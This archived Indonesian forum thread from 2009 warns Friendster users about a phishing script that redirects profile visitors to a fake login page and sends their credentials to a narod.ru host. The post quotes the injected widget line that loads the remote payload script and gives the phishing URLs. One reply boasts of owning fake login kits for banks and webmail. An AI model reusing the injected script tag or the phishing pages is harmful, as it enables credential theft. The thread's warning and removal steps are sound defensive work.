PDA

View Full Version : [WARNING] Friendster Phishing Script


dexlip
03-31-2009, 11:34 AM
Beuh.. pagi˛ udah nemu malscript..
pas saya lagi jalan˛ ke friendster temen saya, taunya di redirect ke page aneh.. miriiiiip banget ma tampilan login friendster (meskipun url di address bar tidak mencurigakan) tapi nampak agak aneh..

http://i40.tinypic.com/257duae.jpg

Buat Friendster users, harap berhati˛ kalo nemu page kyk diatas..
Tampilan di atas bukan halaman dari situs friendster.com!!
Form login di atas keliatannya meminta authentication mail dan password untuk masuk kedalam account friendster anda.. tetapi sebenarnya login anda dikirim ke link lain yang merupakan harvest site yang mengumpulkan data˛ user yang tertipu social engineering friendster phising script ini..

Apa Yang Harus Diperhatikan?
Pada gambar diatas, saya sudah menggabungkan perbedaan antara login form asli dari friendster dengan login form palsu.. Gambar yang ditandai dengan warna merah adalah login form PALSU.. Dan tanda hijau adalah login form asli dari friendster.com

Penjelasan
1. apabila anda meng-hover (menunjuk tanpa mengklik) mouse di atas tombol login #1a, maka pada statusbar browser anda akan terlihat link yang menunjukkan #1b (_http://krismelnik.narod.ru/l.html#)

SEHARUSNYA STATUSBAR MENUNJUKKAN LINK KE #1c (_http://www.friendster.com/login.php#)

2. Apabila kita menghover link EXPLORE #2a, halaman palsu ini tidak menunjukkan adanya dropdown menu..

SEHARUSNYA MUNCUL DROP DOWN MENU seperti #2b

3. Apabila kita mengklik url Friendster #3a, seharusnya gambar google menghilang dan berubah menjadi dropdown menu seperti yang ditunjukkan pada #3b

4. Apabila kita mencoba untuk mengubah bahasa yang digunakan dari #4a akan muncul pilihan bahasa..

Perbedaannya dengan halaman yang asli dapat dilihat di #4b


Analisa
Buka profile yang mengandung script tadi (saya pake firefox), sebelum kita redirect ke login form palsu, pencet escape.. abis itu klik kanan dimanapun (asal jangan diatas text link atau foto) dan pilih View Page Source
karena kita udah tau linknya, kita search dengan keyword domainnya saja (dalam kasus ini krismelnik.narod)..

Langsung keliatan tu payloadnya sebelah mana, ternyata dia nyempil di bagian widgets.. begini kira˛ codenya
<script src="http://krismelnik.narod.ru/li.js">
</script>coba kita buka javascript diatas..
saya remove.. soalnya ngga masup.. characternya buat postnya kebanyakan.. buka sendiri aja ya? ^_^


oo gitu? Jahatnyaaa..

Kesimpulan
Dari pengalaman diatas, kita harus lebih hati˛ ama login form, tidak hanya di friendster saja, tetapi semua site. iya.. SEMUA SITE

lebih baik kita repot ngecek semua link yang ada di login form suatu site daripada kita repot sesudah account kita kena hack ato disalahgunakan ama orang yang ngga bertanggung jawab.. ^_^

kalo ada yang udah pernah nemu page kyk gini dan terlanjur masukin mail ama password, cepet ganti passwordnya.. dan berdoalah mudah˛ alamat email km ngga diserang spam ^_^

add: pake third party application / addon buat nyegah phising (buat firefox banyak), thx buat f3rd1 (http://ansav.com/forum/member.php?u=18) yang udah ngingetin ^_^

dexlip out!!

edit: e iya lupa.. add fs saya oks? _http://friendster.com/twiq
JANGAN LUPA KASI TAU ORANG YANG PROFILENYA KENA MALSCRIPT SERUPA


Solusi baca di sini (http://www.ansav.com/forum/showpost.php?p=3418&postcount=16)

f3rd1
03-31-2009, 11:37 AM
thankz mas info'y...
kira˛ kalo pake add-on firefox (Secure Login) masi bisa kena gak ya?!:(

dewaphobia
03-31-2009, 11:51 AM
emang sekarang orang udah pinter-pinter, sampai-sampai situs b*kep [_http://krismelnik.narod.ru/] jadi situs kamuflase friendster... :o_o::o_o::o_o:

dexlip
03-31-2009, 11:54 AM
lebih tepatnya pinter˛ dan jahat˛..

willgand
03-31-2009, 12:15 PM
kan udah banyak emang script2 kek buat FS/FB/Google/yahoo/dll gadungan yg di share di internet,,,,,jadi banyak memang yg bikin,,,,ada yg tujuannya nyolong account target/sekedar redirect ke web pribadi/iseng/dll.

oh iya sampai ebay juga ada lho yg gadungannya :)

makanya hati2 all, baca webnya lebih rinci jgn tertipu dengan tampilan yg mirip ;)

btw ce ileeee dexlip gambarnye ampe pake watermark segale :p

K4bayan
03-31-2009, 01:03 PM
ini ya tampilan fs-nya ya :)

http://krismelnik.narod.ru/l.html

dexlip
03-31-2009, 01:51 PM
@om will
wkwkw..
daripada watermarknya SPECIMEN
uhaehuae.. maap, kmaren baru rapat KPPS ^_^

@atas
benul.. itu tampilannya

andretans
03-31-2009, 04:50 PM
Untung gue ga pake prendster2an..:D

dewaphobia
03-31-2009, 05:02 PM
ciakakakakak...... eiya, facebook boong-boongan emang udah ada ya?
cepet banget??? :wacko:

darkarchon
03-31-2009, 06:30 PM
oOo
makanya itu saia ndak pernah masuk lagi ke FS
skrg main di FB
trim's info nya mas dex
:D

M2R
03-31-2009, 06:42 PM
wah, saia dah jarang bgt buka FS, skr lbih sring FB ^^ btw, thx a lot mas dexlip

Koza
03-31-2009, 07:38 PM
kwkwkwkwkw
untung aj fs q dah nggk prnh aq buka

totog
04-01-2009, 06:13 AM
nais inpo juragan bos.........:top:

sl4y3r1980
04-02-2009, 08:25 PM
@TS
wah... sepertinya kita harus lapor ini dah ke pihak Friendster... biar semua orang nggak kena... :)

kambinx
04-02-2009, 09:13 PM
@TS
wah... sepertinya kita harus lapor ini dah ke pihak Friendster... biar semua orang nggak kena... :)


yakeen mo di laporin???:sarcastic:

dexlip
04-03-2009, 02:21 AM
Buat yang ngerasa profilenya kena, cek link Apps
trus kalo nemu Application yang namanya wuxiaspear hapus aja..
caranya:
klik tombol edit di sebelah kanan app tadi, trus nanti muncul dialog baru, di pojok kanan bawah dialog tersebut ada tombol delete, pencet itu n malscript tadi ilang ^_^

worked & tested..

andretans
04-03-2009, 12:52 PM
:top: buat kang dexlip. solusinya berkualitas dan teruji..:nulldance:

indoc0der
04-04-2009, 09:16 AM
saya emang punya fake login FS kok mas.. tapi ntu bukan punya saya :D
ada FB, RS, MU, Bank of America, Paypal, gmail, yahoo, dan beberapa lainnya :D

widnyana putra
04-04-2009, 12:53 PM
saia males buka FS

reycaman
04-05-2009, 02:18 PM
hahaha...FS masih buka...emang sih sering ke hack:D

B3lalang_Tempur
04-07-2009, 03:12 PM
ijin copas buat di sebarin di emailya. bro

dexlip
04-11-2009, 06:58 AM
silakan om ^^
jangan lupa di creditsnya masupin ke ansav.com ^^

totog
04-13-2009, 06:20 AM
nais inpo gan.........:top:

sand
07-07-2009, 04:48 PM
wah ada virusnya gak ya...:-?